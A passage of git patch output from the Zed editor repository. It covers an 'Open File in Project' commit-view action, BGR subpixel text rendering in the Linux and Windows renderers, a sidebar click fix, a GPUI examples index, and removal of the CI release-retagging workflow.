+ .read(cx) + .project() + .read(cx) + .entry_for_path(&project_path, cx) + .is_some(); + exists_at_head.then(|| file.clone()) + }); + + menu.when_some(file_to_open, |menu, file| { + let commit_view = self.commit_view.clone(); + menu.entry( + "Open File in Project", + Some(Box::new(OpenFileAtHead)), + move |window, cx| { + commit_view + .update(cx, |view, cx| view.open_file_at_head(&file, window, cx)) + .log_err(); + }, + ) + }) + } } const COMMIT_MESSAGE_SORT_PREFIX: u64 = 0; @@ -130,12 +179,14 @@ impl CommitView { workspace .update_in(cx, |workspace, window, cx| { let project = workspace.project(); + let workspace_handle = cx.weak_entity(); let commit_view = cx.new(|cx| { CommitView::new( commit_details, commit_diff, repo, project.clone(), + workspace_handle, stash, window, cx, @@ -166,6 +217,7 @@ impl CommitView { commit_diff: CommitDiff, repository: Entity, project: Entity, + workspace: WeakEntity, stash: Option, window: &mut Window, cx: &mut Context, @@ -361,8 +413,12 @@ impl CommitView { } this.update(cx, |this, cx| { + let commit_view = cx.weak_entity(); this.editor.update(cx, |editor, _cx| { - editor.register_addon(CommitDiffAddon { file_statuses }); + editor.register_addon(CommitDiffAddon { + file_statuses, + commit_view, + }); }); if !binary_buffer_ids.is_empty() { this.editor.update(cx, |editor, cx| { @@ -396,6 +452,7 @@ impl CommitView { multibuffer, stash, repository, + workspace, remote, } } @@ -420,6 +477,50 @@ impl CommitView { self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } + fn open_file_at_head( + &mut self, + file: &Arc, + window: &mut Window, + cx: &mut Context, + ) { + let rel_path = file.path().clone(); + let worktree_id = file.worktree_id(cx); + let repo_path = RepoPath::from_rel_path(&rel_path); + let project_path = self + .repository + .read(cx) + .repo_path_to_project_path(&repo_path, cx) + .unwrap_or(project::ProjectPath { + worktree_id, + path: rel_path, + }); + + self.workspace + .update(cx, |workspace, cx| { + workspace 
+ .open_path_preview(project_path, None, false, false, true, window, cx) + .detach_and_log_err(cx); + }) + .log_err(); + } + + fn open_file_at_head_action( + &mut self, + _: &OpenFileAtHead, + window: &mut Window, + cx: &mut Context, + ) { + let Some(file) = self + .editor + .read(cx) + .active_buffer(cx) + .and_then(|buffer| buffer.read(cx).file().cloned()) + else { + return; + }; + self.open_file_at_head(&file, window, cx); + } + fn render_header(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let commit = &self.commit; let author_name = commit.author_name.clone(); @@ -934,13 +1035,17 @@ impl Item for CommitView { .map(|addon| addon.file_statuses.clone()) .unwrap_or_default(); Task::ready(Some(cx.new(|cx| { + let commit_view = cx.weak_entity(); let editor = cx.new({ let file_statuses = file_statuses.clone(); |cx| { let mut editor = self .editor .update(cx, |editor, cx| editor.clone(window, cx)); - editor.register_addon(CommitDiffAddon { file_statuses }); + editor.register_addon(CommitDiffAddon { + file_statuses, + commit_view, + }); editor } }); @@ -951,6 +1056,7 @@ impl Item for CommitView { commit: self.commit.clone(), stash: self.stash, repository: self.repository.clone(), + workspace: self.workspace.clone(), remote: self.remote.clone(), } }))) @@ -963,6 +1069,7 @@ impl Render for CommitView { v_flex() .key_context(if is_stash { "StashDiff" } else { "CommitDiff" }) + .on_action(cx.listener(Self::open_file_at_head_action)) .size_full() .bg(cx.theme().colors().editor_background) .child(self.render_header(window, cx)) From 67b9716142f1d531aae21e56827772415437d146 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 14:26:19 +0200 Subject: [PATCH 103/231] Support BGR subpixel layout (#55174) Release Notes: - Added text rendering support for BGR subpixel layouts. 
--- crates/gpui_linux/src/linux/wayland/client.rs | 10 ++++++++-- crates/gpui_linux/src/linux/wayland/window.rs | 12 ++++++++++++ crates/gpui_linux/src/linux/x11/client.rs | 9 +++++++-- crates/gpui_linux/src/linux/x11/window.rs | 7 ++++++- crates/gpui_wgpu/src/shaders.wgsl | 3 ++- crates/gpui_wgpu/src/shaders_subpixel.wgsl | 5 ++++- crates/gpui_wgpu/src/wgpu_renderer.rs | 12 ++++++++++-- crates/gpui_windows/src/directx_renderer.rs | 6 ++++++ crates/gpui_windows/src/shaders.hlsl | 9 +++++++-- 9 files changed, 62 insertions(+), 11 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index 3b8ca0f45025b7..f91efa53e8d391 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -185,6 +185,7 @@ pub struct InProgressOutput { scale: Option, position: Option>, size: Option>, + subpixel: Option, } impl InProgressOutput { @@ -195,6 +196,7 @@ impl InProgressOutput { name: self.name.clone(), scale, bounds: Bounds::new(position, size), + subpixel: self.subpixel, }) } else { None @@ -207,6 +209,7 @@ pub struct Output { pub name: Option, pub scale: i32, pub bounds: Bounds, + pub subpixel: Option, } pub(crate) struct WaylandClientState { @@ -1166,8 +1169,11 @@ impl Dispatch for WaylandClientStatePtr { wl_output::Event::Scale { factor } => { in_progress_output.scale = Some(factor); } - wl_output::Event::Geometry { x, y, .. } => { - in_progress_output.position = Some(point(DevicePixels(x), DevicePixels(y))) + wl_output::Event::Geometry { x, y, subpixel, .. } => { + in_progress_output.position = Some(point(DevicePixels(x), DevicePixels(y))); + if let WEnum::Value(subpixel) = subpixel { + in_progress_output.subpixel = Some(subpixel); + } } wl_output::Event::Mode { width, height, .. 
} => { in_progress_output.size = Some(size(DevicePixels(width), DevicePixels(height))) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 9862d307ef0f92..5d53496c057f1a 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -403,6 +403,16 @@ impl WaylandWindowState { || self.background_appearance != WindowBackgroundAppearance::Opaque } + fn update_subpixel_layout(&mut self) { + use wayland_client::protocol::wl_output::Subpixel; + let is_bgr = self + .display + .as_ref() + .and_then(|(_, output)| output.subpixel) + .is_some_and(|s| s == Subpixel::HorizontalBgr); + self.renderer.set_subpixel_layout(is_bgr); + } + pub fn primary_output_scale(&mut self) -> i32 { let mut scale = 1; let mut current_output = self.display.take(); @@ -864,6 +874,7 @@ impl WaylandWindowStatePtr { state.outputs.insert(id, output.clone()); let scale = state.primary_output_scale(); + state.update_subpixel_layout(); // We use `PreferredBufferScale` instead to set the scale if it's available if state.surface.version() < wl_surface::EVT_PREFERRED_BUFFER_SCALE_SINCE { @@ -876,6 +887,7 @@ impl WaylandWindowStatePtr { state.outputs.remove(&output.id()); let scale = state.primary_output_scale(); + state.update_subpixel_layout(); // We use `PreferredBufferScale` instead to set the scale if it's available if state.surface.version() < wl_surface::EVT_PREFERRED_BUFFER_SCALE_SINCE { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 07d1596a2f7b68..03272a99051aa7 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -188,7 +188,7 @@ pub struct X11ClientState { xkb_device_id: i32, client_side_decorations_supported: bool, pub(crate) x_root_index: usize, - pub(crate) _resource_database: Database, + pub(crate) resource_database: Database, pub(crate) atoms: XcbAtoms, pub(crate) windows: 
HashMap, pub(crate) mouse_focused_window: Option, @@ -525,7 +525,7 @@ impl X11Client { xkb_device_id, client_side_decorations_supported, x_root_index, - _resource_database: resource_database, + resource_database, atoms, windows: HashMap::default(), mouse_focused_window: None, @@ -1599,6 +1599,10 @@ impl LinuxClient for X11Client { let appearance = state.common.appearance; let compositor_gpu = state.compositor_gpu.take(); let supports_xinput_gestures = state.supports_xinput_gestures; + let is_bgr = state + .resource_database + .get_string("Xft.rgba", "Xft.Rgba") + .is_some_and(|v| v.eq_ignore_ascii_case("bgr")); let window = X11Window::new( handle, X11ClientStatePtr(Rc::downgrade(&self.0)), @@ -1615,6 +1619,7 @@ impl LinuxClient for X11Client { appearance, parent_window, supports_xinput_gestures, + is_bgr, )?; check_reply( || "Failed to set XdndAware property", diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 285ba8802db744..b44ac2faf41821 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -425,6 +425,7 @@ impl X11WindowState { appearance: WindowAppearance, parent_window: Option, supports_xinput_gestures: bool, + is_bgr: bool, ) -> anyhow::Result { let x_screen_index = params .display_id @@ -702,7 +703,7 @@ impl X11WindowState { xcb_flush(xcb); - let renderer = { + let mut renderer = { let raw_window = RawWindow { connection: as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection( xcb, @@ -725,6 +726,8 @@ impl X11WindowState { WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; + renderer.set_subpixel_layout(is_bgr); + // Set max window size hints based on the GPU's maximum texture dimension. // This prevents the window from being resized larger than what the GPU can render. 
let max_texture_size = renderer.max_texture_size(); @@ -883,6 +886,7 @@ impl X11Window { appearance: WindowAppearance, parent_window: Option, supports_xinput_gestures: bool, + is_bgr: bool, ) -> anyhow::Result { let ptr = X11WindowStatePtr { state: Rc::new(RefCell::new(X11WindowState::new( @@ -901,6 +905,7 @@ impl X11Window { appearance, parent_window, supports_xinput_gestures, + is_bgr, )?)), callbacks: Rc::new(RefCell::new(Callbacks::default())), xcb: xcb.clone(), diff --git a/crates/gpui_wgpu/src/shaders.wgsl b/crates/gpui_wgpu/src/shaders.wgsl index 12ce7d29b0b816..b700697f47b932 100644 --- a/crates/gpui_wgpu/src/shaders.wgsl +++ b/crates/gpui_wgpu/src/shaders.wgsl @@ -87,7 +87,8 @@ struct GammaParams { gamma_ratios: vec4, grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, - pad: vec2, + is_bgr: u32, + pad: u32, } @group(0) @binding(0) var globals: GlobalParams; diff --git a/crates/gpui_wgpu/src/shaders_subpixel.wgsl b/crates/gpui_wgpu/src/shaders_subpixel.wgsl index 7acbd2e3d2e68e..37face0c482ac4 100644 --- a/crates/gpui_wgpu/src/shaders_subpixel.wgsl +++ b/crates/gpui_wgpu/src/shaders_subpixel.wgsl @@ -38,7 +38,10 @@ fn vs_subpixel_sprite(@builtin(vertex_index) vertex_id: u32, @builtin(instance_i @fragment fn fs_subpixel_sprite(input: SubpixelSpriteOutput) -> SubpixelSpriteFragmentOutput { - let sample = textureSample(t_sprite, s_sprite, input.tile_position).rgb; + var sample = textureSample(t_sprite, s_sprite, input.tile_position).rgb; + if (gamma_params.is_bgr != 0u) { + sample = sample.bgr; + } let alpha_corrected = apply_contrast_and_gamma_correction3(sample, input.color.rgb, gamma_params.subpixel_enhanced_contrast, gamma_params.gamma_ratios); // Alpha clip after using the derivatives. 
diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 39b6f3f7bdfee9..7377c73fea1030 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -50,7 +50,8 @@ struct GammaParams { gamma_ratios: [f32; 4], grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, - _pad: [f32; 2], + is_bgr: u32, + _pad: u32, } #[derive(Clone, Debug)] @@ -146,6 +147,7 @@ pub struct WgpuRenderer { max_buffer_size: u64, storage_buffer_alignment: u64, rendering_params: RenderingParameters, + is_bgr: bool, dual_source_blending: bool, adapter_info: wgpu::AdapterInfo, transparent_alpha_mode: wgpu::CompositeAlphaMode, @@ -475,6 +477,7 @@ impl WgpuRenderer { max_buffer_size, storage_buffer_alignment, rendering_params, + is_bgr: false, dual_source_blending, adapter_info, transparent_alpha_mode, @@ -1016,6 +1019,10 @@ impl WgpuRenderer { resources.path_msaa_view = path_msaa_view; } + pub fn set_subpixel_layout(&mut self, is_bgr: bool) { + self.is_bgr = is_bgr; + } + pub fn update_transparency(&mut self, transparent: bool) { let new_alpha_mode = if transparent { self.transparent_alpha_mode @@ -1147,7 +1154,8 @@ impl WgpuRenderer { gamma_ratios: self.rendering_params.gamma_ratios, grayscale_enhanced_contrast: self.rendering_params.grayscale_enhanced_contrast, subpixel_enhanced_contrast: self.rendering_params.subpixel_enhanced_contrast, - _pad: [0.0; 2], + is_bgr: self.is_bgr as u32, + _pad: 0, }; let globals = GlobalParams { diff --git a/crates/gpui_windows/src/directx_renderer.rs b/crates/gpui_windows/src/directx_renderer.rs index 2955b23429bda6..b5c4d3bf34a946 100644 --- a/crates/gpui_windows/src/directx_renderer.rs +++ b/crates/gpui_windows/src/directx_renderer.rs @@ -32,6 +32,7 @@ pub(crate) struct FontInfo { pub gamma_ratios: [f32; 4], pub grayscale_enhanced_contrast: f32, pub subpixel_enhanced_contrast: f32, + pub is_bgr: bool, } pub(crate) struct DirectXRenderer { @@ -195,6 +196,8 @@ impl 
DirectXRenderer { viewport_size: [resources.viewport.Width, resources.viewport.Height], grayscale_enhanced_contrast: self.font_info.grayscale_enhanced_contrast, subpixel_enhanced_contrast: self.font_info.subpixel_enhanced_contrast, + is_bgr: self.font_info.is_bgr as u32, + _pad: [0; 3], }], )?; unsafe { @@ -741,6 +744,7 @@ impl DirectXRenderer { gamma_ratios: gpui::get_gamma_correction_ratios(render_params.GetGamma()), grayscale_enhanced_contrast: render_params.GetGrayscaleEnhancedContrast(), subpixel_enhanced_contrast: render_params.GetEnhancedContrast(), + is_bgr: render_params.GetPixelGeometry() == DWRITE_PIXEL_GEOMETRY_BGR, } }) } @@ -961,6 +965,8 @@ struct GlobalParams { viewport_size: [f32; 2], grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, + is_bgr: u32, + _pad: [u32; 3], } struct PipelineState { diff --git a/crates/gpui_windows/src/shaders.hlsl b/crates/gpui_windows/src/shaders.hlsl index 646cfd61cc37c3..d40c7241bd0f23 100644 --- a/crates/gpui_windows/src/shaders.hlsl +++ b/crates/gpui_windows/src/shaders.hlsl @@ -5,6 +5,8 @@ cbuffer GlobalParams: register(b0) { float2 global_viewport_size; float grayscale_enhanced_contrast; float subpixel_enhanced_contrast; + uint is_bgr; + uint3 global_pad; }; Texture2D t_sprite: register(t0); @@ -420,11 +422,11 @@ float4 gradient_color(Background background, // checkerboard float size = background.gradient_angle_or_pattern_height; float2 relative_position = position - bounds.origin; - + float x_index = floor(relative_position.x / size); float y_index = floor(relative_position.y / size); float should_be_colored = (x_index + y_index) % 2.0; - + color = solid_color; color.a *= saturate(should_be_colored); break; @@ -1157,6 +1159,9 @@ MonochromeSpriteVertexOutput subpixel_sprite_vertex(uint vertex_id: SV_VertexID, SubpixelSpriteFragmentOutput subpixel_sprite_fragment(MonochromeSpriteFragmentInput input) { float3 sample = t_sprite.Sample(s_sprite, input.tile_position).rgb; + if (is_bgr) { + sample = 
sample.bgr; + } float3 alpha_corrected = apply_contrast_and_gamma_correction3(sample, input.color.rgb, subpixel_enhanced_contrast, gamma_ratios); SubpixelSpriteFragmentOutput output; From 804e7dc38eca9ca9636179b8729ca714a7ddea84 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 09:31:24 -0300 Subject: [PATCH 104/231] sidebar: Don't do anything on cmd-click if project is already active (#55190) Prevent flashing the currently selected thread upon cmd-clicking the active project's header. Release Notes: - Fixed a bug where a thread within the currently active project would flash upon cmd-clicking the project header. --- crates/sidebar/src/sidebar.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index aa07b8c3eef1be..12df8a7f1cba14 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -4182,6 +4182,9 @@ impl Sidebar { .and_then(|mw| mw.read(cx).last_active_workspace_for_group(key, cx)) .or_else(|| self.workspace_for_group(key, cx)); if let Some(workspace) = workspace { + if self.is_active_workspace(&workspace, cx) { + return; + } self.activate_workspace(&workspace, window, cx); } else { self.open_workspace_for_group(key, window, cx); From 873a457d42feab4e4d1fe4af7c80e7e8ce326c0a Mon Sep 17 00:00:00 2001 From: sunwukk990 <82385875+grgwuk990@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:36:29 -0400 Subject: [PATCH 105/231] gpui: Add examples index (#55154) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: 
Christopher Biscardi --- crates/gpui/README.md | 2 +- crates/gpui/examples/README.md | 71 ++++++++++++++++++++++++++++++++++ 2 files changed, 72 insertions(+), 1 deletion(-) create mode 100644 crates/gpui/examples/README.md diff --git a/crates/gpui/README.md b/crates/gpui/README.md index ad3fd37fc55857..e7950de23a8db2 100644 --- a/crates/gpui/README.md +++ b/crates/gpui/README.md @@ -11,7 +11,7 @@ GPUI is still in active development as we work on the Zed code editor, and is st gpui = { version = "*" } ``` - - [Ownership and data flow](_ownership_and_data_flow) +- [Ownership and data flow](_ownership_and_data_flow) Everything in GPUI starts with an `Application`. You can create one with `Application::new()`, and kick off your application by passing a callback to `Application::run()`. Inside this callback, you can create a new window with `App::open_window()`, and register your first root view. See [gpui.rs](https://www.gpui.rs/) for a complete example. diff --git a/crates/gpui/examples/README.md b/crates/gpui/examples/README.md new file mode 100644 index 00000000000000..7fc75e0f5bad7f --- /dev/null +++ b/crates/gpui/examples/README.md @@ -0,0 +1,71 @@ +# GPUI Examples + +Examples can be run from the Zed repository root: + +```sh +cargo run -p gpui --example hello_world +``` + +## Where to start + +- `hello_world` shows the basic shape of a GPUI application: create an + `Application`, open a window, create a root view, and render a `div`. +- `input` demonstrates text input, focus, selections, clipboard actions, and + keyboard bindings. +- `uniform_list` shows how to render a simple virtualized list. +- `testing` demonstrates `#[gpui::test]`, `TestAppContext`, actions, focus, and + window-based tests. + +## Layout and styling + +- `grid_layout` demonstrates CSS-grid-style layout. +- `opacity` demonstrates opacity styling. +- `pattern` shows patterned backgrounds. +- `shadow` demonstrates box shadows. +- `text` shows styled text rendering. 
+- `text_layout` demonstrates text alignment, decoration, weights, and wrapping. +- `text_wrapper` shows wrapping text content. + +## Interaction + +- `anchor` demonstrates anchored positioning. +- `data_table` combines virtualized list rendering with table-style rows and a + custom scrollbar. +- `drag_drop` shows draggable elements and drop targets. +- `focus_visible` demonstrates keyboard-visible focus styling. +- `mouse_pressure` demonstrates pressure-sensitive pointer input where supported. +- `popover` shows floating layers with `deferred` and `anchored`. +- `scrollable` demonstrates scrollable content. +- `tab_stop` shows keyboard tab navigation. + +## Images, drawing, and animation + +- `animation` demonstrates GPUI animations and animated SVG transforms. +- `gif_viewer` shows GIF rendering. +- `gradient` demonstrates linear gradients and color spaces. +- `image` shows local and remote image loading, image sizing, and asset setup. +- `image_gallery` demonstrates image caching and loading remote images. +- `image_loading` shows image loading states and asset loading. +- `painting` demonstrates custom drawing with paths and canvas. +- `svg` shows SVG rendering. + +## Windows and application behavior + +- `move_entity_between_windows` shows moving an entity between windows. +- `on_window_close_quit` demonstrates quitting when a window closes. +- `set_menus` shows application menu setup. +- `window` demonstrates creating normal, dialog, popup, and floating windows. +- `window_positioning` demonstrates window bounds and placement. +- `window_shadow` demonstrates window shadow styling. + +## Specialized examples + +These examples are useful when working on GPUI itself, but they may not be the +best starting point for new applications: + +- `active_state_bug` is a focused active-state reproduction. +- `layer_shell` demonstrates Linux layer-shell windows. +- `list_example` demonstrates bottom-aligned list state and scrollbar behavior. 
+- `ownership_post` supports the ownership and data-flow documentation. +- `paths_bench` is a path rendering benchmark. +- `tree` renders a deep tree of nested elements. From e39e061ed303cfec039ecc00fe69c3e051aea62b Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Wed, 29 Apr 2026 15:13:37 +0200 Subject: [PATCH 106/231] ci: Remove release retagging support (#55199) From now on, we will instead just make another patch version bump. That has the advantage that tags will actually always only be applied to the version bump and not some random change as well as us being able to prohibit updates of tag refs for the Zed Zippy identity as well. Release Notes: - N/A --- .github/workflows/bump_patch_version.yml | 10 -- .github/workflows/retag_release.yml | 88 --------------- script/retag-release | 38 ------- tooling/xtask/src/tasks/workflows.rs | 2 - .../src/tasks/workflows/bump_patch_version.rs | 13 --- .../src/tasks/workflows/retag_release.rs | 100 ------------------ 6 files changed, 251 deletions(-) delete mode 100644 .github/workflows/retag_release.yml delete mode 100755 script/retag-release delete mode 100644 tooling/xtask/src/tasks/workflows/retag_release.rs diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index a12a1f5e43f52b..3618d7230f79b4 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -50,16 +50,6 @@ jobs: echo "version=$version" echo "tag_suffix=$tag_suffix" } >> "$GITHUB_OUTPUT" - - name: bump_patch_version::run_bump_patch_version::verify_prior_release_exists - run: | - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" != "200" ]]; then - echo "::error::version $VERSION has not been released on $CHANNEL yet (HTTP $status) — bump the patch version only after the current version is released" - exit 1 - fi - env: - CHANNEL: ${{ steps.channel.outputs.channel }} 
- VERSION: ${{ steps.channel.outputs.version }} - name: steps::install_cargo_edit uses: taiki-e/install-action@02cc5f8ca9f2301050c0c099055816a41ee05507 with: diff --git a/.github/workflows/retag_release.yml b/.github/workflows/retag_release.yml deleted file mode 100644 index 0cd3710ba358ad..00000000000000 --- a/.github/workflows/retag_release.yml +++ /dev/null @@ -1,88 +0,0 @@ -# Generated from xtask::workflows::retag_release -# Rebuild with `cargo xtask workflows`. -name: retag_release -on: - workflow_dispatch: - inputs: - branch: - description: Release branch to re-tag (e.g. v0.180.x) - required: true - type: string -jobs: - run_retag_release: - if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') - runs-on: namespace-profile-16x32-ubuntu-2204 - steps: - - id: generate-token - name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 - with: - app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} - private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - - name: steps::checkout_repo - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd - with: - clean: false - ref: ${{ inputs.branch }} - token: ${{ steps.generate-token.outputs.token }} - - id: info - name: retag_release::run_retag_release::resolve_tag - run: | - if [[ ! 
"$BRANCH" =~ ^v[0-9]+\.[0-9]{1,3}\.x$ ]]; then - echo "::error::branch '$BRANCH' does not match the release branch pattern v[N].[N].x" - exit 1 - fi - - channel="$(cat crates/zed/RELEASE_CHANNEL)" - - tag_suffix="" - case $channel in - stable) - ;; - preview) - tag_suffix="-pre" - ;; - *) - echo "::error::must be run on a stable or preview release branch" - exit 1 - ;; - esac - - version=$(script/get-crate-version zed) - - { - echo "channel=$channel" - echo "version=$version" - echo "tag_suffix=$tag_suffix" - echo "head_sha=$(git rev-parse HEAD)" - } >> "$GITHUB_OUTPUT" - env: - BRANCH: ${{ inputs.branch }} - - name: retag_release::run_retag_release::verify_no_existing_release - run: | - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" == "200" ]]; then - echo "::error::version $VERSION is already released on $CHANNEL — cannot re-tag a released version" - exit 1 - fi - env: - CHANNEL: ${{ steps.info.outputs.channel }} - VERSION: ${{ steps.info.outputs.version }} - - name: steps::update_tag - uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b - with: - script: | - github.rest.git.updateRef({ - owner: context.repo.owner, - repo: context.repo.repo, - ref: 'tags/v${{ steps.info.outputs.version }}${{ steps.info.outputs.tag_suffix }}', - sha: '${{ steps.info.outputs.head_sha }}', - force: true - }) - github-token: ${{ steps.generate-token.outputs.token }} -concurrency: - group: ${{ github.workflow }}-${{ inputs.branch }} - cancel-in-progress: true -defaults: - run: - shell: bash -euxo pipefail {0} diff --git a/script/retag-release b/script/retag-release deleted file mode 100755 index f7097e19941ba0..00000000000000 --- a/script/retag-release +++ /dev/null @@ -1,38 +0,0 @@ -#!/usr/bin/env bash - -set -eu - -usage() { - echo "Usage: $0 " - echo "" - echo "Re-tags the HEAD of a release branch by force-updating the tag." 
- echo "This is useful when commits were added to a release branch after" - echo "tagging but before the release was published." - echo "" - echo "Arguments:" - echo " branch Release branch name (e.g. v0.180.x)" - exit 1 -} - -branch="${1:-}" - -if [[ -z "$branch" ]]; then - usage -fi - -which gh > /dev/null 2>&1 || { - echo "error: GitHub CLI (gh) is required but not installed." >&2 - echo "Install it with: brew install gh" >&2 - exit 1 -} - -echo "Triggering retag_release workflow:" -echo " branch: $branch" -echo "" - -gh workflow run retag_release.yml \ - -f branch="$branch" - -echo "" -echo "Workflow triggered. Monitor progress at:" -echo " https://github.com/zed-industries/zed/actions/workflows/retag_release.yml" diff --git a/tooling/xtask/src/tasks/workflows.rs b/tooling/xtask/src/tasks/workflows.rs index 69dd1b3d34ed24..2e21363bb65003 100644 --- a/tooling/xtask/src/tasks/workflows.rs +++ b/tooling/xtask/src/tasks/workflows.rs @@ -23,7 +23,6 @@ mod extensions; mod nix_build; mod publish_extension_cli; mod release_nightly; -mod retag_release; mod run_bundling; mod release; @@ -211,7 +210,6 @@ pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> { WorkflowFile::zed(publish_extension_cli::publish_extension_cli), WorkflowFile::zed(release::release), WorkflowFile::zed(release_nightly::release_nightly), - WorkflowFile::zed(retag_release::retag_release), WorkflowFile::zed(run_agent_evals::run_cron_unit_evals), WorkflowFile::zed(run_agent_evals::run_unit_evals), WorkflowFile::zed(run_bundling::run_bundling), diff --git a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs index a657e77f3d0329..fcff7418a2530c 100644 --- a/tooling/xtask/src/tasks/workflows/bump_patch_version.rs +++ b/tooling/xtask/src/tasks/workflows/bump_patch_version.rs @@ -56,18 +56,6 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .id("channel") } - fn verify_prior_release_exists() -> Step { - 
named::bash(indoc::indoc! {r#" - status=$(curl -s -o /dev/null -w '%{http_code}' "https://cloud.zed.dev/releases/$CHANNEL/$VERSION/asset?asset=zed&os=macos&arch=aarch64") - if [[ "$status" != "200" ]]; then - echo "::error::version $VERSION has not been released on $CHANNEL yet (HTTP $status) — bump the patch version only after the current version is released" - exit 1 - fi - "#}) - .add_env(("CHANNEL", "${{ steps.channel.outputs.channel }}")) - .add_env(("VERSION", "${{ steps.channel.outputs.version }}")) - } - fn bump_version() -> Step { named::bash(indoc::indoc! {r#" version="$(cargo set-version -p zed --bump patch 2>&1 | sed 's/.* //')" @@ -96,7 +84,6 @@ fn run_bump_patch_version(branch: &WorkflowInput) -> steps::NamedJob { .add_step(authenticate) .add_step(checkout_branch(branch, &token)) .add_step(channel_step) - .add_step(verify_prior_release_exists()) .add_step(steps::install_cargo_edit()) .add_step(bump_version_step) .add_step(commit_step) diff --git a/tooling/xtask/src/tasks/workflows/retag_release.rs b/tooling/xtask/src/tasks/workflows/retag_release.rs deleted file mode 100644 index 98296a8f0432b1..00000000000000 --- a/tooling/xtask/src/tasks/workflows/retag_release.rs +++ /dev/null @@ -1,100 +0,0 @@ -use gh_workflow::*; - -use crate::tasks::workflows::{ - runners, - steps::{self, CheckoutStep, CommonJobConditions, named}, - vars::{StepOutput, WorkflowInput}, -}; - -pub fn retag_release() -> Workflow { - let branch = WorkflowInput::string("branch", None) - .description("Release branch to re-tag (e.g. 
v0.180.x)"); - let retag_job = run_retag_release(&branch); - named::workflow() - .on(Event::default() - .workflow_dispatch(WorkflowDispatch::default().add_input(branch.name, branch.input()))) - .concurrency( - Concurrency::new(Expression::new(format!( - "${{{{ github.workflow }}}}-{branch}" - ))) - .cancel_in_progress(true), - ) - .add_job(retag_job.name, retag_job.job) -} - -fn run_retag_release(branch: &WorkflowInput) -> steps::NamedJob { - fn checkout_branch(branch: &WorkflowInput, token: &StepOutput) -> CheckoutStep { - steps::checkout_repo() - .with_token(token) - .with_ref(branch.to_string()) - } - - fn resolve_tag(branch: &WorkflowInput) -> Step { - named::bash(indoc::indoc! {r#" - if [[ ! "$BRANCH" =~ ^v[0-9]+\.[0-9]{1,3}\.x$ ]]; then - echo "::error::branch '$BRANCH' does not match the release branch pattern v[N].[N].x" - exit 1 - fi - - channel="$(cat crates/zed/RELEASE_CHANNEL)" - - tag_suffix="" - case $channel in - stable) - ;; - preview) - tag_suffix="-pre" - ;; - *) - echo "::error::must be run on a stable or preview release branch" - exit 1 - ;; - esac - - version=$(script/get-crate-version zed) - - { - echo "channel=$channel" - echo "version=$version" - echo "tag_suffix=$tag_suffix" - echo "head_sha=$(git rev-parse HEAD)" - } >> "$GITHUB_OUTPUT" - "#}) - .id("info") - .add_env(("BRANCH", branch.to_string())) - } - - fn verify_no_existing_release() -> Step { - named::bash(indoc::indoc! 
